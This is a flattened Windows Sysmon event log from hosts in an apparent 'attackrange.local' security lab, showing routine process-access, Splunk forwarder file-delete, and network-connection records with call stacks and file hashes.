
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:11.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C802B6C275D4BED593CEA75AA9FC1D88,SHA256=BB737AA0DA7DB63FC51F0C5F47EA681C256B5DD5BF484A67429D400373B1317A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:11.991{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4EFD2514AFC3B92874763A8C664B8453,SHA256=1CDED4415F152EBC4CE3F8159416F692E141C43947BF503A78920B8A67C758C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:11.991{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB6861F91F85DEAECB76585ABF11C93B,SHA256=C1E05D16F0CED500D5C8768D8138E67E61AE903C55F1A103E83C1DA75A5C883E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:02.776{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51052-false10.0.1.12-8000- 23542300x80000000000000001049587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:11.137{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43351876DADBB18A5D4B1C10B3AC7A5A,SHA256=7E096B1A38111D28CA99385D56BEC1E8B79F4DAFED7E05864CE94AD953AA5A35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:11.104{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001049585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:11.104{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45216E8738DFB7DB1EA564FE1674BCF1,SHA256=A09C6BC49C8D9BC0E00BF15ED05DDEE1AD4B07045CEBA288752DDA71308E746D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.375{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.307{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.291{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.291{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.276{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.276{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.244{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.244{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.244{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
